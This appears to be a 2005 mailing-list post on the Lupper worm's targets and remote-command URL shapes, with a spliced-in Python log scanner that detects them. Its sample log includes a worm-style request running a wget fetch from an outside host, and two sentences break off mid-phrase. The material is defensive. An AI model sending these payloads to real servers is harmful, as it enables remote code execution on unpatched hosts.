[conspire] Lupper redux

Rick Moen rick at linuxmafia.com
Wed Dec 14 02:10:00 PST 2005

Since http://linuxmafia.com/~rick/faq/index.php?page=virus#virus5
aspires to document all Linux malware, I've just caught up regarding the
Lupper worm:

NAME:  Lupper (Lupii, Plupii)
APPEARED:  Nov. 11, 2005.
VULNERABLE:  PHPXMLRPC messaging library v. 1.1.1, via URL input
validation bug enabling execution of arbitrary PHP.  Fixed Aug. 8, 2005.
VULNERABLE:  AWstats Web-statistics Perl CGI script, v. 6.3, via a URL
input validation bug.  Fixed June 10, 2005.
VULNERABLE:  Darryl C. Burgdorf's WebHints proprietary "thought for the
day" Perl CGI script, v. 1.02, has _zero_ URL input validation, a design
failure publicised May 9, 2005.  (References to v. 1.03 and 1.3 are in
VULNERABLE:  Jimmy's "The Includer" proprietary SSI-emulation Perl CGI
script v. 1.1, has _zero_ URL input validation, a design failure
publicised March 3, 2005.

This worm -- exploiting vulnerabilities already fixed or eliminated for
three, five, six, and eight months, respectively -- derived from the
earlier Slapper worm codebase.  Thus far, it exists only as an i386 Linux
binary, fetched to target Web servers' /tmp directory by one of the four
obsolete, vulnerable Web apps, and then run as httpd.  One of those
exploits (against PHPXMLRPC) would work equally well (after recompiling
the worm) on any operating system.  The others invoke Bourne-like shells
(and thus are feasible on any Unix, but on MS-Windows only with Cygwin,
etc.).  The AWstats exploit also calls wget, via buggily-parsed URL input
of the form "configdir=|program".

The Includer and WebHints CGIs' failures to validate input are total:
URLs "http://www.example.com/hints.pl?|program|",
"http://www.example.com/includer.cgi?|program|", and
"http://www.example.com/includer.cgi?template=|program|" all remotely
execute "program".  However, it's important to note that 
_neither is packaged_ by Linux distributions:  Either would have to be
downloaded and installed manually by an admin of uncommonly bad

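As an added illustration, not part of the original post, here is a small Python scanner that looks through Apache Common Log Format lines for exactly the request shapes described above: a bare "|program|" query against hints.pl or includer.cgi, "template=|program|" against includer.cgi, and AWstats' "configdir=|program" form.  The log lines are constructed for the example; the /cgi-bin/ path, the script basenames, and the 198.51.100.7 address are assumptions, and the "shell-metachar" label is a lower-confidence catch-all I added for other shell syntax in a query to one of those three scripts.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache Common Log Format; the quoted request line carries the URL we care about.
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed basenames for the three CGIs named in the post.
WATCHED_CGIS = {"awstats.pl", "hints.pl", "includer.cgi"}
# Shell syntax that has no business in a query to those scripts ('&' is the
# parameter separator and is handled by the splitter, so it is not listed).
SHELL_META = re.compile(r"[|;`$<>]")


def query_params(raw_query):
    """Split a raw query string on '&' only (never on ';', which is shell
    syntax inside these payloads) and percent-decode names and values.
    A chunk with no '=' comes back as (name, '') so 'hints.pl?|id|' is kept."""
    params = []
    for chunk in raw_query.split("&"):
        if chunk == "":
            continue
        name, _, value = chunk.partition("=")
        params.append((unquote(name), unquote(value)))
    return params


def parse_clf(line):
    """Parse one CLF line; return a dict or None if the line is not CLF."""
    m = CLF_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["script"] = parts.path.rsplit("/", 1)[-1]
    entry["params"] = query_params(parts.query)
    return entry


def classify(entry):
    """Label one parsed request, or return None if it looks benign."""
    if entry["script"] not in WATCHED_CGIS:
        return None
    for name, value in entry["params"]:
        # hints.pl?|prog| and includer.cgi?|prog| arrive as a parameter *name*
        # with no value; includer.cgi?template=|prog| and awstats.pl?configdir=|prog
        # arrive as a *value*.  Either way the decoded text starts with a pipe,
        # which is the shape the post gives for all three scripts.
        if name.startswith("|"):
            return "pipe-in-bare-query"
        if value.startswith("|"):
            return "pipe-in-param:" + name
    for name, value in entry["params"]:
        if SHELL_META.search(name) or SHELL_META.search(value):
            return "shell-metachar-in-query"
    return None


def scan(lines):
    """Return (client host, label, decoded request) for every suspicious line."""
    hits = []
    for line in lines:
        entry = parse_clf(line)
        if entry is None:
            continue
        label = classify(entry)
        if label is not None:
            decoded = entry["path"] + "?" + "&".join(
                n if v == "" else n + "=" + v for n, v in entry["params"])
            hits.append((entry["host"], label, decoded))
    return hits


# Constructed sample log: one benign AWstats hit, the three attack shapes from
# the post (percent-encoded as a client would send them), one pipe in a query
# to an unrelated script, and one non-CLF line.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Dec/2005:01:12:04 -0800] "GET /cgi-bin/awstats.pl?config=www.example.com HTTP/1.1" 200 9031',
    '198.51.100.7 - - [14/Dec/2005:01:12:09 -0800] "GET /cgi-bin/awstats.pl?configdir=%7Ccd%20/tmp;wget%20http://198.51.100.7/x%7C HTTP/1.0" 200 1843',
    '198.51.100.7 - - [14/Dec/2005:01:12:10 -0800] "GET /cgi-bin/hints.pl?%7Cid%7C HTTP/1.0" 200 212',
    '198.51.100.7 - - [14/Dec/2005:01:12:11 -0800] "GET /cgi-bin/includer.cgi?template=%7Cid%7C HTTP/1.0" 500 0',
    '203.0.113.4 - - [14/Dec/2005:01:13:00 -0800] "GET /cgi-bin/search.cgi?q=a%7Cb HTTP/1.1" 200 1200',
    'garbage line',
]

if __name__ == "__main__":
    for host, label, request in scan(SAMPLE_LOG):
        print(host, label, request)
```

The scanner decodes before matching, because the worm's "|" arrives as %7C on the wire; a grep for a literal pipe in the raw log would miss it.  Splitting the query on "&" alone matters too: a library that also splits on ";" (older urllib behaviour) would chop the payload into harmless-looking fragments.

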
The AWstats CGI, by contrast, is sometimes packaged but never, to the
best of my ability to tell, installed by default in any Linux
distribution:  It has historically been notorious for input validation
flaws, and thus is best run in its optional configuration that generates
static HTML pages (http://www.debian-administration.org/articles/85) ,
rather than its default CGI mode.

PHPXMLRPC is usually offered via optional, supplemental PHP add-on
packages but is never, to the best of my ability to tell, installed by
default in any Linux distribution.  Like the related and identically
vulnerable (fixed the same day, but not attacked so far by this worm)
PEAR XML-RPC v. 1.3.3 messaging library, it would probably get installed
as part of overfeatured, developed PHP-based Web applications such as
Ampache, b2evolution, egroupware, MailWatch for MailScanner, Nucleus
CMS, phpmyfaq, phpPgAds, phpgroupware, PostNuke, TikiWiki, and Xaraya;
plus older versions of Civicspace and Drupal.

(The two PHP-coded XML-RPC implementations should not be confused with
PHP's optional xmlrpc-epi extension, in C, included with PHP since v.
4.1.0, or various other non-PHP implementations.)

One lesson that's common to all of those exploits is that Linux
Web-server admins need to be extra careful of applications that will
process public data, e.g., via URL input, and doubly careful (lest they
miss needed fixes) of any they choose to install outside their
distributions' regular maintenance regimes.  As it happens, the worm
requires rather rare (not to mention old) Web-app vulnerabilities, and
extremely few systems have been reported affected.  ("Affected" means
that the attacker can compromise the httpd process but not the Web host
as a whole, without some separate and more serious method to compromise
the machine.)
